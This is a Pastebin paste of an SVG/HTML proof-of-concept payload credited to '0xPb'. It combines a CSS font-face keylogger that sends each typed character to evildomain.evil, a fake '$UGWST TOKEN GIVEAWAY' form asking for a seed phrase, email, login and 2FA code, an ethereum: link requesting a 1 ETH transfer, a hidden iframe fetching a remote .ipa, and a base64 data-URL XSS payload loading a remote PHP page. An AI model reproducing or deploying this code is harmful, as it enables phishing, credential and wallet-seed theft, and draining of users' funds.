Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <SvG width="960" height="850">
- <g transform="translate(300, 0) rotate(20)">
- <foreignObject x="10" y="10" width="800" height="800">
- <body xmlns="http://www.w3.org/1999/xhtml">
- <style>
- @font-face {
- font-family: 'Red Hat Display',sans-serif;
- font-style: normal;
- font-weight: 400;
- src: url(https://fonts.googleapis.com/css2?family=Red+Hat+Display:wght@300;700&display=swap)
- }
- * {
- font-family: 'Red Hat Display',sans-serif;
- font-style: normal;
- font-weight: 400;
- color: white !important;
- fill: white !important;
- background-image: url('https://i.pinimg.com/originals/43/7c/b7/437cb739d14912acd84d65ee853b9067.gif');
- background-repeat: no-repeat;
- -webkit-background-size: cover;
- -moz-background-size: cover;
- -o-background-size: cover;
- background-size: cover;
- }
- html, body {
- margin: 0;
- background-image: #121619;
- background-color: #121619;
- }
- .container {
- --characters: 26;
- --typingSpeed: 5s;
- height: 50%;
- display: flex;
- justify-content: center;
- align-items: center;
- font-size: 3em;
- }
- .container .text {
- position: relative;
- }
- .container .text::before, .container .text::after {
- content: "";
- position: absolute;
- top: 0;
- left: 0;
- right: 0;
- bottom: 0;
- }
- .container .text::before {
- background-color:rgb(27 30 46);
- background-image: url('https://i.pinimg.com/originals/43/7c/b7/437cb739d14912acd84d65ee853b9067.gif');
- background-repeat: no-repeat;
- -webkit-background-size: cover;
- -moz-background-size: cover;
- -o-background-size: cover;
- background-size: cover;
- animation: typing var(--typingSpeed) steps(var(--characters)) 2s infinite;
- }
- .container .text::after {
- background: green;
- width: 1ch;
- animation: typing var(--typingSpeed) steps(var(--characters)) 2s infinite, blinking 0.25s ease alternate infinite;
- }
- @keyframes blinking {
- to {
- background: transparent;
- }
- }
- @keyframes typing {
- 80%, 100% {
- left: 100%;
- }
- }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=a), local(Impact); unicode-range: U+61; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=b), local(Impact); unicode-range: U+62; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=c), local(Impact); unicode-range: U+63; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=d), local(Impact); unicode-range: U+64; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=e), local(Impact); unicode-range: U+65; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=f), local(Impact); unicode-range: U+66; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=g), local(Impact); unicode-range: U+67; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=h), local(Impact); unicode-range: U+68; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=i), local(Impact); unicode-range: U+69; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=j), local(Impact); unicode-range: U+6a; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=k), local(Impact); unicode-range: U+6b; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=l), local(Impact); unicode-range: U+6c; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=m), local(Impact); unicode-range: U+6d; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=n), local(Impact); unicode-range: U+6e; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=o), local(Impact); unicode-range: U+6f; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=p), local(Impact); unicode-range: U+70; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=q), local(Impact); unicode-range: U+71; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=r), local(Impact); unicode-range: U+72; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=s), local(Impact); unicode-range: U+73; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=t), local(Impact); unicode-range: U+74; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=u), local(Impact); unicode-range: U+75; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=v), local(Impact); unicode-range: U+76; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=w), local(Impact); unicode-range: U+77; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=y), local(Impact); unicode-range: U+78; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=x), local(Impact); unicode-range: U+79; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=z), local(Impact); unicode-range: U+7a; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=0), local(Impact); unicode-range: U+30; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=1), local(Impact); unicode-range: U+31; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=2), local(Impact); unicode-range: U+32; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=3), local(Impact); unicode-range: U+33; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=4), local(Impact); unicode-range: U+34; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=5), local(Impact); unicode-range: U+35; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=6), local(Impact); unicode-range: U+36; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=7), local(Impact); unicode-range: U+37; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=8), local(Impact); unicode-range: U+38; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=9), local(Impact); unicode-range: U+39; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%60), local(Impact); unicode-range: U+60; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=~), local(Impact); unicode-range: U+7e; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=!), local(Impact); unicode-range: U+21; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=@), local(Impact); unicode-range: U+40; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=#), local(Impact); unicode-range: U+23; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=$), local(Impact); unicode-range: U+24; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%), local(Impact); unicode-range: U+25; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=^), local(Impact); unicode-range: U+5e; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=*), local(Impact); unicode-range: U+2a; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%28), local(Impact); unicode-range: U+28; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%29), local(Impact); unicode-range: U+29; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=_), local(Impact); unicode-range: U+5f; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=-), local(Impact); unicode-range: U+2d; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password==), local(Impact); unicode-range: U+3d; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=+), local(Impact); unicode-range: U+2b; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%5b), local(Impact); unicode-range: U+5b; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%7b), local(Impact); unicode-range: U+7b; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%5d), local(Impact); unicode-range: U+5d; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%7d), local(Impact); unicode-range: U+7d; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%5c), local(Impact); unicode-range: U+5c; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%7c), local(Impact); unicode-range: U+7c; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%27), local(Impact); unicode-range: U+27; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%22), local(Impact); unicode-range: U+22; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3b), local(Impact); unicode-range: U+3b; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3a), local(Impact); unicode-range: U+3a; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%2f), local(Impact); unicode-range: U+2f; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3f), local(Impact); unicode-range: U+3f; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%2e), local(Impact); unicode-range: U+2e; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3e), local(Impact); unicode-range: U+3e; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%2c), local(Impact); unicode-range: U+2c; }
- @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3c), local(Impact); unicode-range: U+3c; }
- input{ font-family: x, sans-serif; }
- </style>
- <iframe style="opacity:0;visibilty:hidden;" width="1px" height="1px;" src="https://ugwst.com/pocs/1.ipa">
- </iframe><b><div class="text" style="text-align:center">
- </div>
- <div class="container">
- <div class="text" style="text-align:center">
- <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUPTznKAmqBw8wG5BqSEq0s1ScjHqFA_iZn3J96xgwhZgq0hsBAuYCkhDLyMjbRYSKVXa8drYThBfd-V8buqV5hETu99H9O_NXqQf4XU4xlujD-xMTtcgn1vsQel7wV1J4t1W9TVIAC_t7-RjUFhis8Oua2wwQyIKVGAbLOCr_T-5CQaSLd_w7u0owbQ/s16000/xss-1.webp" height="250px;" width="750px;"></img><br></br>PoC made by <a href='https://twitter.com/_0xPb'><b>0xPb</b><a><p></p> <font style="text-decoration:underline;">
- Web2 POC + Web3 Wallet Transaction Signing</font> <font style="text-decoration:underline;"> + FULL INJECTION</font><br></br></div></div><div class="text" style="text-align:center;color:shadow!important">
- <br></br>
- <h1 style="text-decoration:underline;">
- $UGWST TOKEN GIVEAWAY</h1><b>Seedphrase:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
- <br></br><b>EMAIL ADDRESS:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
- <iframe src='SVdDT057WTBVXzRSM180X0czTjFVU30='>
- <br></br><b>LOGIN:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
- <br></br><b>2FA:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
- <br></br><a href="ethereum:0x6Ef4bb9DdCfb9f9D116A11F3F8662B6E0E1a6629?value=1000000000000000000&data=PoC&gas=30000&gasPrice=30000" target="_self">
- <button style="width:300px!important;border:none;font-size:16px;line-height:24px;color:#fff;font-weight:600;padding:8px;24px;padding-top:8px;padding-bottom:8px;border-radius:4px;text-decoration:none;display:inline-block;cursor:pointer;width:100%;margin-top:29px;margin-bottom:29px;padding-top:13px;padding-bottom:13px;background-color:rgba(54, 56, 64, 0.6) !important;" type="submit" class="LoginContainer_button__3c9Ij/Button_container__2B8O8 Button_disabled__1f6YP" data-test-id="sign-in-button">
- <svg width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg" class="MuiSvgIcon-root MuiSvgIcon-fontSizeSmall" focusable="false" aria-hidden="true" style="margin-right: 8px;"><path d="M14.5 11H13.5C13.2239 11 13 11.2239 13 11.5C13 11.7761 13.2239 12 13.5 12H14.5C14.7761 12 15 11.7761 15 11.5C15 11.2239 14.7761 11 14.5 11ZM4.5 3C3.67157 3 3 3.67157 3 4.5V14.5C3 15.8807 4.11929 17 5.5 17H15.5C16.3284 17 17 16.3284 17 15.5V6.5C17 5.84689 16.5826 5.29127 16 5.08535V4.5C16 3.67157 15.3284 3 14.5 3H4.5ZM4 14.5V5.91465C4.15639 5.96992 4.32468 6 4.5 6H15.5C15.7761 6 16 6.22386 16 6.5V15.5C16 15.7761 15.7761 16 15.5 16H5.5C4.67157 16 4 15.3284 4 14.5ZM4.5 4H14.5C14.7761 4 15 4.22386 15 4.5V5H4.5C4.22386 5 4 4.77614 4 4.5C4 4.22386 4.22386 4 4.5 4Z"></path></svg>Connect Wallet (Android / iOS) - DEFI PoC</button><br></br>
- <a href="data:text/html;base64,PGltZyBzcmMgb25lcnJvcj0nYWxlcnQoMTMzNyArICJcclxudWd3c3QgWFNTIiknPjxpZnJhbWUvc3JjPWh0dHBzOi8vdWd3c3QuY29tL3BvY3MvMWZjMzZhMmMtYTA3OS00YzVhLThjNDMtYzA1Zjg3ZDgzYzM2L3ZubS5waHAgc3R5bGU9dmlzaWJpbGl0eTpoaWRkZW4+PC9pZnJhbWU+" target="_self"><button style="width:300px!important;border:none;font-size:16px;line-height:24px;color:#fff;font-weight:600;padding:8px;24px;padding-top:8px;padding-bottom:8px;border-radius:4px;text-decoration:none;display:inline-block;cursor:pointer;width:100%;margin-top:29px;margin-bottom:29px;padding-top:13px;padding-bottom:13px;background-color:rgba(54, 56, 64, 0.6) !important;" type="submit" class="LoginContainer_button__3c9Ij/Button_container__2B8O8 Button_disabled__1f6YP" data-test-id="sign-in-button">
- XSS Bypass (Open In new Tab / Close -> CTRL+SHIFT+T)</button></a></a><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br></div>
- </b></body>
- </foreignObject>
- </g>
- </SvG>
Add Comment
Please, Sign In to add comment